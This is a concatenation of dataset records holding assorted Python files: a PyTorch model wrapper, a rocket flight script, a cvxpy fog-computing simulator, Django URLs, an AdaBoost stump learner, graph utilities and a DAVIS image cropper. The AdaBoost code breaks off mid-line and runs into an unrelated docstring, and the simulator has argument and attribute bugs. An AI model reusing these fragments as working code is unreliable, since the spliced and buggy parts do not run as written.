\"\"\" Do the forward pass. \"\"\"\n \n x = self.features(x)\n \n x = x.view(-1, self.num_features)\n \n x = self.classifier(x)\n return x\n \n def cross_validate(self, X, y, n_splits=4, epochs=100, verbose=False):\n \"\"\" Run cross validation on the model and return the obtained test and train scores. \"\"\"\n \n kf = KFold(n_splits=n_splits, random_state=1, shuffle=True)\n tr_scores = []\n va_scores = []\n\n result = {\n \"train_score\": [],\n \"test_score\" : []\n }\n\n split_n = 1\n i = 0\n for tr_indices, va_indices in kf.split(X):\n i+=1\n if verbose: \n print(\"----------------- fold \" + str(i) + \"/\" + str(n_splits) + \" -----------------\")\n tr_indices = tr_indices.tolist()\n va_indices = va_indices.tolist()\n X_tr, y_tr = X[tr_indices], y[tr_indices]\n X_te, y_te = X[va_indices], y[va_indices]\n\n self.clear()\n self.fit(X_tr, y_tr, X_te, y_te, epochs=epochs, verbose=verbose, callbacks=[keep_best_model])\n\n result[\"train_score\"].append(self.score(X_tr, y_tr))\n result[\"test_score\"].append(self.score(X_te, y_te))\n\n return result\n \n def save_model(self, model_state=None):\n \"\"\" Save the model to /model. \"\"\"\n \n if model_state is None:\n model_state = self.state_dict()\n \n self.save_data(model_state, \"model\")\n return self\n \n def load_model(self):\n \"\"\" Load the model parameters from /model. \"\"\" \n self.load_state_dict(self.load_data(\"model\"))\n return self\n\n def save_data(self, data, file_path=\"data\", pickle_protocol=2):\n \"\"\" Save the passed list of predictions to /. \"\"\"\n file_path = self.dir_path + \"/\" + file_path\n dir_path = os.path.dirname(file_path)\n \n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n \n torch.save(data, file_path, pickle_protocol=pickle_protocol)\n return self\n \n def load_data(self, file_path=\"data\"):\n \"\"\" Load and return the list of predictions from /. \"\"\"\n \n file_path = self.dir_path + \"/\" + file_path\n \n if not os.path.isfile(file_path):\n raise Exception(\"Could not find the file:\" + file_path)\n \n return torch.load(file_path)\n \n def clear(self):\n \"\"\" Reinitialize the network (used during cross validation).\"\"\"\n device = next(self.parameters()).device\n \n self.__init__(**self.setting)\n self.to(device)\n","sub_path":"modelWrapper.py","file_name":"modelWrapper.py","file_ext":"py","file_size_in_byte":10553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"386815898","text":"# System modules\nimport sys # System utilities\nfrom pathlib import Path\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n# Path modifications\npaths = [\"../build/src\", \"../src/preproc\", \"../src/util\"]\n\nfor item in paths:\n addPath = Path(__file__).parent / item\n sys.path.append(str(addPath.resolve()))\n\n#-----------------------------------------------------------------------------#\n\nimport preproc_engine\nimport model\n\n# Initialize engine model\ntime, thrust, mass = preproc_engine.load(\"../input/engine/AeroTech_J450DM.eng\")\n\neng = model.Engine()\neng.init(time, thrust, mass)\n\n# Initialize mass model\nmass = model.Mass()\nmass.init(5)\nmass.add_dep(eng)\n\n# Initialize geodetic model\n# SARA launch site: (32.269798483027344, -111.27475082401067)\nlat = 32.2698\nlat *= math.pi/180\n\ngeo = model.Geodetic()\ngeo.init(lat)\n\n# Initialize EOM model\neom = model.EOM()\neom.init()\n\neom.add_dep(eng)\neom.add_dep(mass)\neom.add_dep(geo)\n\n# Initialize flight\nflt = model.Flight()\nflt.add_dep(eom)\n\nt0 = 0.0\ndt = 0.01\ntf = 50.0\n\nflt.init(t0, dt, tf)\n\nflt.update()\nflt.write_telem(\"../output/test.csv\")","sub_path":"tools/test_flight.py","file_name":"test_flight.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"118310696","text":"import math\nimport copy\nimport service\nimport matplotlib\nimport cvxpy as cp\nimport numpy as np\nimport multiprocessing\nimport computation_node\nfrom itertools import repeat\nimport matplotlib.pyplot as plt\n\nC = 6e7\nETA = 0.9\n\ndef propagationDelay(point1, point2):\n return math.hypot(point1[0] - point2[0], point1[1] - point2[1]) / C\n\ndef getComputNodeDelay(srcDst, computeNode):\n tau = 0\n if computeNode.type == \"edge\" or computeNode.type == \"Edge\":\n tau += propagationDelay(srcDst[\"position\"], srcDst[\"switch\"][\"position\"])\n tau += propagationDelay(computeNode.position, computeNode.switch[\"position\"])\n tau += srcDst[\"switch\"][\"delay\"]\n if srcDst[\"switch\"] != computeNode.switch:\n tau += computeNode.switch[\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"position\"])\n tau += propagationDelay(computeNode.switch[\"position\"], computeNode.switch[\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"delay\"]\n if srcDst[\"switch\"][\"parent\"] != computeNode.switch[\"parent\"]:\n tau += computeNode.switch[\"parent\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"])\n tau += propagationDelay(computeNode.switch[\"parent\"][\"position\"], computeNode.switch[\"parent\"][\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"parent\"][\"delay\"]\n if srcDst[\"switch\"][\"parent\"][\"parent\"] != computeNode.switch[\"parent\"][\"parent\"]:\n tau += computeNode.switch[\"parent\"][\"parent\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"], computeNode.switch[\"parent\"][\"parent\"][\"position\"])\n elif computeNode.type == \"cloud\" or computeNode.type == \"Cloud\":\n tau += propagationDelay(srcDst[\"position\"], srcDst[\"switch\"][\"position\"])\n tau += srcDst[\"switch\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"parent\"][\"delay\"]\n if srcDst[\"switch\"][\"parent\"][\"parent\"] != computeNode.switch:\n tau += computeNode.switch[\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"], computeNode.switch[\"position\"])\n tau += propagationDelay(computeNode.position, computeNode.switch[\"position\"])\n else:\n raise Exception(\"{} not found\".format(computeNode.type))\n return tau\n\nclass Simulator:\n def __init__(self, name, d, switches, epsilon = 1):\n self.name = name\n self.switches = switches\n for list1, list2 in zip(self.switches[0:2], self.switches[1:3]):\n for switch1 in list1:\n distances = [(switch1[\"position\"][0]-switch2[\"position\"][0])**2+(switch1[\"position\"][1]-switch2[\"position\"][1])**2 for switch2 in list2]\n switch2 = list2[distances.index(min(distances))]\n switch1[\"parent\"] = switch2\n self.computationNodes = []\n self.services = []\n self.totalUtilityList = []\n self.roundCount = 0\n self.utilityValue = 1e12\n self.I = []\n self.epsilon = epsilon\n\n def getSwitch(self, position, level=0):\n switches = self.switches[level]\n distances = [math.hypot(switch[\"position\"][0]-position[0], switch[\"position\"][1]-position[1]) for switch in switches]\n switch = switches[distances.index(min(distances))]\n return switch\n\n def addNode(self, C, U, position):\n switch = self.getSwitch(position)\n newNode = computation_node.ComputationNode(index=len(self.computationNodes), C=C, U=U, type=\"Edge\", switch=switch, position=position)\n self.computationNodes.append(newNode)\n\n def addCloud(self, numberOfResources, C, U=0.1, position=[0,0]):\n switch = self.getSwitch(position, level=2)\n for index in range(numberOfResources):\n newNode = computation_node.ComputationNode(index=len(self.computationNodes), C=C, U=U, type=\"Cloud\", switch=switch, position=position, Q=40)\n self.computationNodes.append(newNode)\n\n def addService(self, F, R, alpha, w, center, sources, destinations):\n src = [ {\"position\":s, \"switch\": self.getSwitch(s)}for s in sources]\n dst = [ {\"position\":d, \"switch\": self.getSwitch(d)}for d in destinations]\n newService = service.Service(index=len(self.services), F=F, R=R, alpha=alpha, w=w, center=center, sources=src, destinations=dst, simulator=self)\n self.services.append(newService)\n\n def nameLessFunction(self, I, logLevel=0, verbose=False):\n try:\n r = cp.Variable((len(self.computationNodes), len(self.services)))\n u = cp.Variable((len(self.computationNodes), len(self.services)))\n d = cp.Variable((len(self.computationNodes), len(self.services)))\n rTotal = cp.Variable(len(self.services))\n dMax = cp.Variable(len(self.services))\n obj = None\n constraints = []\n for service in self.services:\n s = service.index\n alpha = service.alpha\n if I[:,s].any():\n rates = None\n for node in self.computationNodes:\n i = node.index\n if I[i,s] == True:\n if rates is None:\n rates = r[i,s]\n else:\n rates += r[i,s]\n constraints.append(0 <= r[i,s])\n constraints.append(r[i,s] <= ETA*u[i,s]*node.U*node.C/service.F)\n constraints.append(-cp.log(u[i,s]*node.U*node.C/service.F-r[i,s]) <= cp.log(d[i,s]-service.tau[i]))\n constraints.append(d[i,s] <= dMax[s])\n constraints.append(rTotal[s] == rates)\n serviceObj = service.alpha*((service.w*cp.abs(rTotal[s]-service.R)) + (1-service.w)*dMax[s])\n else:\n serviceObj = service.alpha*service.w*service.R\n if obj is None:\n obj = serviceObj\n else:\n obj += serviceObj\n for node in self.computationNodes:\n i = node.index\n us = None\n if I[i,:].any():\n for service in self.services:\n s = service.index\n if I[i,s] == True:\n if us is None:\n us = u[i,s]\n else:\n us += u[i,s]\n constraints.append(us <= 1)\n objective = cp.Minimize(obj)\n prob = cp.Problem(objective, constraints)\n result = prob.solve(solver=\"ECOS\", verbose=False)\n if logLevel > 3:\n print(\"problem:\")\n# print(prob)\n print(prob.status)\n print(\"value:\", prob.value)\n print(\"r:\", r.value)\n print(\"u:\", u.value)\n print(\"d:\", d.value)\n print(\"D:\", dMax.value)\n print(\"R:\", rTotal.value)\n solution = {}\n solution[\"r\"] = r.value\n solution[\"u\"] = u.value\n solution[\"d\"] = d.value\n solution[\"rTotal\"] = rTotal.value\n solution[\"dMax\"] = dMax.value\n solution[\"objective\"] = prob.value\n return (prob.value, solution)\n except Exception as e:\n print(e)\n return (1e12, None)\n\n def check(self, I, lastMin, lastMinI, logLevel=0, verbose=False):\n if logLevel > 2:\n print(\"s\\tI\")\n print(I)\n tmp = self.nameLessFunction(I=I, logLevel=logLevel, verbose=verbose)[0]\n newValue = copy.deepcopy(tmp)\n if logLevel > 1:\n print(\"min: {:.4}, last min: {:.4}, , diff: {:.4}, newValue: {:.4}\".format(min, self.utilityValue, self.utilityValue - lastMin, newValue))\n return (copy.deepcopy(newValue), copy.deepcopy(I)) if newValue < lastMin else (lastMin, lastMinI)\n\n def serviceRound(self, service, lastMin, lastMinI, logLevel=0, verbose=False):\n min = copy.deepcopy(self.utilityValue)\n minI = copy.deepcopy(self.I)\n I = copy.deepcopy(self.I)\n s = service.index\n for node in self.computationNodes:\n i = node.index\n if self.I[i,s] == True:\n I[i,s] = False\n (min, minI) = self.check(I, min, minI, logLevel, verbose)\n I[i,s] = True\n for node1 in self.computationNodes:\n i1 = node1.index\n if I[i1,s] == False:\n I[i1,s] = True\n if sum(I[:,s]) < service.Q and sum(I[i1,:]) < node1.Q:\n (min, minI) = self.check(I, min, minI, logLevel, verbose)\n for node2 in self.computationNodes:\n i2 = node2.index\n if I[i2,s] == True and i2 != i1:\n I[i2,s] = False\n (min, minI) = self.check(I, min, minI, logLevel, verbose)\n I[i2,s] = True\n I[i1,s] = False\n return (min, minI)\n\n def round(self, logLevel=0, verbose=False):\n min = copy.deepcopy(self.utilityValue)\n minI = copy.deepcopy(self.I)\n with multiprocessing.Pool() as pool:\n results = pool.starmap(self.serviceRound, zip(self.services, repeat(logLevel),repeat(verbose)))\n for result in results:\n if (result[0] < min):\n min = result[0]\n minI = result[1]\n self.roundCount += 1\n diff = self.utilityValue - min\n if logLevel > 0:\n print('\\t\\tRound {}:'.format(self.roundCount))\n print('\\t\\t\\tmin: {:.4}, last min: {:.4} -> diff: {:.4}'.format(min, self.utilityValue, diff))\n if diff > self.epsilon:\n self.utilityValue = copy.deepcopy(min)\n self.I = copy.deepcopy(minI)\n self.totalUtilityList.append(self.utilityValue)\n if min > self.epsilon:\n return True\n return False\n\n def run(self, nearest=False, random=False, logLevel=0, verbose=False):\n self.clear()\n if random or nearest:\n for s in self.services:\n if random:\n s.selectRandom()\n else:\n s.selectNearest()\n else:\n for service in self.services:\n service.initialize()\n while True:\n if not self.round(logLevel=logLevel, verbose=verbose):\n self.solution = self.nameLessFunction(I=self.I, logLevel=4, verbose=verbose)[1]\n print('\\t\\tFinish')\n break\n\n def totalCost(self):\n return self.utilityValue\n\n def clear(self):\n self.totalUtilityList = []\n self.utilityValue = 1e12\n self.roundCount = 0;\n for node in self.computationNodes:\n node.reset()\n for service in self.services:\n service.reset()\n self.I = np.zeros((len(self.computationNodes), len(self.services)),dtype=bool)\n\n def reset(self):\n self.totalUtilityList = []\n self.utilityValue = 1e12\n self.roundCount = 0;\n self.computeNodes = []\n self.services = []\n\n def printResults(self):\n print(\"Services:\")\n for service in self.services:\n print(\"#{}\".format(service.index + 1))\n nodeIndex = service.node\n if nodeIndex:\n node = self.fogNodes[nodeIndex]\n print(\"\\tR:{}\".format(service.R))\n print(\"\\tNode #{}-> C:{}, U:{}\".format(nodeIndex, node.C, node.U))\n print(\"\\tprice: {}, r:{}, u:{}\".format(node.highestBid, service.rates[nodeIndex], node.C*node.U/service.F))\n else:\n print(\"\\tNo allocation\")\n\n def plot(self, drawLines=False):\n font = {'family' : 'Times New Roman', 'size' : 25}\n matplotlib.rc('font', **font)\n matplotlib.rc('lines', linewidth=4, markeredgewidth=3, markersize=10)\n matplotlib.rc('grid', linewidth=1.5, linestyle='-.')\n plt.clf()\n self._drawNetowrkTopolog()\n drawed = [False] * 2\n for node in self.computationNodes:\n position = node.position\n switch = node.switch\n if node.type == \"Edge\":\n type = 0\n else:\n type = 1\n plt.plot(position[0], position[1], 'b*' if node.type == \"Edge\" else 'c*', label = node.type + ' Computation Nodes' if drawed[type] == False else '')\n drawed[type] = True\n #plt.annotate(str(\"{:.2f}\".format(node.C*node.U)),xy=(node.position[0], node.position[1]), ha='center', va='bottom',color='blue')\n plt.plot([switch[\"position\"][0], position[0]], [switch[\"position\"][1], position[1]], 'k.-')\n for count, s in enumerate(self.services):\n plt.plot(s.center[0], s.center[1], 'r.', label= 'Services' if count == 0 else '')\n# if s.node:\n# position = self.fogNodes[s.node].position\n# plt.plot([position[0], s.center[0]], [position[1], s.center[1]], 'c.-')\n plt.legend()\n plt.show()\n\n def _drawNetowrkTopolog(self):\n for list, color in zip(self.switches[0:2], ['r', 'g']):\n for switch in list:\n plt.plot([switch[\"position\"][0], switch[\"parent\"][\"position\"][0]], [switch[\"position\"][1], switch[\"parent\"][\"position\"][1]], color + '.-')\n drawed = [False] * 3\n for list, color, layer in zip(self.switches, ['rx', 'gx', 'bx'], range(3)):\n for switch in list:\n plt.plot(switch[\"position\"][0], switch[\"position\"][1], color, label = 'Layer' + str(layer+1) + ' Switch' if drawed[layer] == False else '')\n drawed[layer] = True\n\n def plotNetowrkTopolog(self):\n plt.clf()\n self._drawNetowrkTopolog()\n plt.show()\n\n def plotOptimalityEvolution(self):\n plt.plot(range(1, self.roundCount), self.totalUtilityList, 'g-')\n plt.show()\n","sub_path":"7/simulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":12856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"353525135","text":"# -*- coding: utf-8 -*-\n# __author__ = 'budurli'\nfrom django.conf.urls import patterns, url\nfrom apps.exercises.views import (TeachersExerciseListView, TeacherDetailExerciseView, NewExerciseView,\n StatementView)\n\nurlpatterns = patterns(\n '',\n url(r'list/$', TeachersExerciseListView.as_view(), name='list'),\n url(r'(?P\\d+)/detail/$', TeacherDetailExerciseView.as_view(), name='detail'),\n url(r'create/$', NewExerciseView.as_view(), name='create'),\n\n url(r'statement/$', StatementView.as_view(), name='statement')\n)","sub_path":"apps/exercises/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"647912350","text":"from numpy import *\ndef loadSimData():\n dataMat=matrix([[1.0,2.1],\n [2.0,1.1],\n [1.3,1.0],\n [1.0,1.0],\n [2.0,1.0]])\n classLabels=[1.0,1.0,-1.0,-1.0,1.0]\n return dataMat,classLabels\n\ndef stumpClassfy(dataMatrix,dimen,threshVal,threshIneq):\n '''简单决策树,在此只有一个节点,此函数通过判断threshIneq值来决定数据集中某列大于某个阈值时置为-1,否则小于某阈值置-1'''\n retArray=ones((shape(dataMatrix)[0],1))\n\n if threshIneq == 'lt':\n retArray[dataMatrix[:,dimen]<= threshVal]=-1.0\n else:\n retArray[dataMatrix[:,dimen]> threshVal]=-1.0\n return retArray\ndef buildStump(dataArr,classLabels,D):\n '''找到数据集上最佳的单层决策树'''\n dataMatrix=mat(dataArr)\n labelMat=mat(classLabels).T\n m,n=shape(dataMatrix)\n numSteps=10.0#定义步数\n bestStump={}#最好的树,用字典保存\n bestClassEst=mat(zeros((m,1)))#定义预测值\n minError=inf#最小误差,初始化为正无穷大\n for i in range(n):\n rangeMin=dataMatrix[:,i].min()#第i列最小值\n rangeMax=dataMatrix[:,i].max()\n stepSize=(rangeMax-rangeMin)/numSteps#定义步长\n for j in range(-1,int(numSteps)+1):\n for inequal in ['lt','gt']:\n threshVal=(rangeMin+float(j)*stepSize)#计算后设置当前比较的阈值\n predictedVals=stumpClassfy(dataMatrix,i,threshVal,inequal)\n errArr=mat(ones((m,1)))\n errArr[predictedVals==labelMat]=0#errArr用于计算权重,预测正确则设为0\n weightedError=D.T*errArr#用来计算加权错误率,\n print(\"split:dim %d,thresh %.2f,thresh inequal:%s,the weighted error is :%.3f\"%(i,threshVal,inequal,weightedError))\n if weightedError>> from tabulate import tabulate\n\n>>> table = [[\"Sun\",696000,1989100000],[\"Earth\",6371,5973.6],\n... [\"Moon\",1737,73.5],[\"Mars\",3390,641.85]]\n>>> print tabulate(table)\n----- ------ -------------\nSun 696000 1.9891e+09\nEarth 6371 5973.6\nMoon 1737 73.5\nMars 3390 641.85\n----- ------ ------------\n\"\"\"\n","sub_path":"2-nd/from week2/pList.py","file_name":"pList.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"63146421","text":"import networkx as nx\nimport random\nimport numpy as np\n\n\ndef _random_subset(seq, m):\n \"\"\" Return m unique elements from seq.\n\n This differs from random.sample which can return repeated\n elements if seq holds repeated elements.\n \"\"\"\n targets = set()\n while len(targets) < m:\n x = random.choice(seq)\n targets.add(x)\n return targets\n\n\ndef dms_graph_basic(N, k0, m=5, seed=None):\n \"\"\"\n Build DorogovtsevMendesSamukhin graph.\n\n Graph is 'basic' as we use the case m=m0 (as required for problem sheet m=m0=5).\n\n Usage: G=dms_graph_basic(N,k0)\n\n Input:\n N - Number of nodes\n k0 - damping factor\n\n Output:\n G - A Networkx graph\n \"\"\"\n\n if seed is not None:\n random.seed(seed)\n\n G = nx.complete_graph(m)\n targets = list(range(m))\n repeated_nodes = list(range(m)) * (m - 1 + k0)\n source = m\n\n while source < N:\n G.add_edges_from(zip([source] * m, targets))\n repeated_nodes.extend(targets)\n repeated_nodes.extend([source] * (m + k0))\n targets = _random_subset(repeated_nodes, m)\n source += 1\n return G\n\n\ndef deg_dist(G):\n \"\"\"\n Builds the degree dist for a graph G\n\n Usage: d=deg_dist(G)\n\n Input:\n G - A graph with N nodes\n\n Output:\n d - A Numpy array of length N with d[k] = probability of degree k\n \"\"\"\n N = len(nx.nodes(G))\n degs = nx.degree_histogram(G) # get degree histogram (list)\n if len(degs) < N: # standadize length (for when we run many realizations)\n degs = degs + [0] * (N - len(degs))\n degs = np.asarray(degs, dtype=float) # make numpy array\n degs = degs / np.sum(degs)\n return degs\n\n\ndef knn(G, kmax=200):\n \"\"\"\n Get the neighbour distribution knn\n\n Usage: knn=knn(G,kmax)\n\n Input:\n G - a graph\n kmax - the max degree to consider\n\n Output:\n knn - a vector of length kmax. NOTE: We should careful to interpret 0's in this vector properly. If knn[k]=0 this just means it is undefined and should be ignored when averaging over reps!!\n\n \"\"\"\n N = len(nx.nodes(G))\n knn = np.zeros(kmax) # the final vector\n A = nx.to_numpy_matrix(G) # get adj matix as numpy array\n d = np.asarray(list(dict(nx.degree(G)).values()), dtype=float) # get degrees, convert to numpy, reshape.\n d = np.reshape(d, (1, N)) # So d[i] is degree of node i\n for k in range(kmax): # loop on k\n delta = np.equal(k, d).astype(int)\n delta = np.reshape(delta, (1, N)) # delta vector. delta[i]=1 if d[i]=k.\n t1 = np.multiply(np.multiply(np.multiply(A, delta.T), d), 1 / d.T) # numerator (uses broadcasting. Google me!)\n t1 = np.sum(np.sum(t1))\n t2 = np.sum(delta) # denominator\n if t2 != 0: # fill in Knn[k,r]\n knn[k] = t1 / t2\n return knn\n\n\ndef flatten(A):\n \"\"\"\n Flattens an array of dims nxm to a vector of shape 1x(n*m)\n\n Usage: f=flatten(A)\n \"\"\"\n return np.reshape(A, (1, -1))\n\n\ndef connected_comps_sizes(G):\n \"\"\"\n Reverse List of sizes of connectd components\n \"\"\"\n return [len(c) for c in sorted(nx.connected_components(G), key=len, reverse=True)]\n","sub_path":"graphUtils.py","file_name":"graphUtils.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"251573333","text":"import argparse\nfrom pathlib import Path\n\nimport scipy\nfrom skimage import io\nfrom PIL import Image\nfrom joblib import Parallel, delayed\nimport numpy as np\n\nimport davis\n# davis.io.imread_indexed\n\n\n_ANN_REL_PATH = Path(\"Annotations/Full-Resolution/\")\n_IMG_REL_PATH = Path(\"JPEGImages/Full-Resolution/\")\n\n_TRAIN_REL_PATH= Path(\"ImageSets/2017/train.txt\")\n_VAL_REL_PATH= Path(\"ImageSets/2017/val.txt\")\n\n\n\n\ndef main(cmdline):\n gen = gen_get_elems(cmdline.dataset, cmdline.outpath)\n\n if cmdline.workers == 0:\n for input_tuple in gen:\n process_seq(*input_tuple)\n\n else:\n par = Parallel(n_jobs=cmdline.workers)\n par(delayed(process_seq)(*input_tuple) for input_tuple in gen)\n\n\n\ndef gen_get_elems(base_path, out_path):\n\n ann_p = base_path / _ANN_REL_PATH\n img_p = base_path / _IMG_REL_PATH\n\n for sub_d in img_p.iterdir():\n name = sub_d.name\n outdir = out_path / name\n outdir.mkdir(exist_ok=True)\n yield sub_d, ann_p / name, outdir\n\n\n\ndef process_seq(img_d, ann_d, dest_d):\n\n\n ann_l = sorted(ann_d.glob(\"*.png\"))\n img_l = list(img_d / ( str(ann.name).rstrip(\"png\") + \"jpg\")\n for ann in ann_l)\n\n annotations = np.array([davis.io.imread_indexed(str(ann))[0]\n for ann in ann_l])\n\n n_labels = np.unique(annotations)\n n_labels = n_labels[n_labels != 0]\n\n for lab_id in n_labels:\n out_f = dest_d / str(lab_id)\n out_f.mkdir(exist_ok=True)\n\n for ann, img_path in zip(annotations, img_l):\n objs = scipy.ndimage.find_objects(ann)\n img = io.imread(str(img_path))\n\n for ann_rng, ann_id in zip(objs,np.arange(1, len(objs) + 1)):\n \n if ann_rng is not None:\n formatted = cut_image(img, ann, ann_id, ann_rng)\n out_path = dest_d / str(ann_id) / img_path.name\n formatted.save(str(out_path))\n\n\n\n\n\n\ndef cut_image(image, annotation, ann_id, ann_rng, res_edge=240):\n\n pad_color = np.array((127, 127,127)).astype(np.uint8)\n final_img = np.tile(pad_color, image.shape[0:2] + (1,))\n final_img[annotation == ann_id, ...] = image[annotation == ann_id, ...]\n\n final_img = final_img[ann_rng]\n squared = make_square(Image.fromarray(final_img))\n \n resized = squared.resize((res_edge, res_edge))\n\n return resized\n\n\n \ndef make_square(im,fill_color=(127, 127, 127)):\n x, y = im.size\n size = max(x, y)\n new_im = Image.new('RGB', (size, size), fill_color)\n new_im.paste(im, ((size - x) // 2, (size - y) // 2))\n return new_im \n\n\n\ndef abs_path(path):\n return Path(path).resolve()\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"dataset\", type=abs_path,\n help=\"directory containing the davis full res dataset\")\n parser.add_argument(\"outpath\", type=abs_path,\n help=\"output directory\")\n parser.add_argument(\"-w\", \"--workers\", type=int, default=0, \n help=\"number of worker processes\")\n args = parser.parse_args()\n main(args)\n","sub_path":"scripts/fmtdavis.py","file_name":"fmtdavis.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"286468713","text":"'''\n问题描述:\n写一个方法,接受给定字符串作为输入,\n返回将这个字符串逐个字符翻转后的新字符串。\n示例:\n输入:\"hello world\"\n输出:\"dlrow olleh\"\n思路:\n\n'''\n\nclass Solution:\n \"\"\"\n @param s: a string\n @return: return a string\n \"\"\"\n def reverseString(self, s):\n # write your code here\n # 方法1:从后往前取字符既可\n reverse_string = ''\n for i in range(len(s)):\n reverse_string += s[len(s)-(i+1)]\n return reverse_string\n # 方法2:直接列表操作返回\n # return s[::-1]","sub_path":"1283_done.py","file_name":"1283_done.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}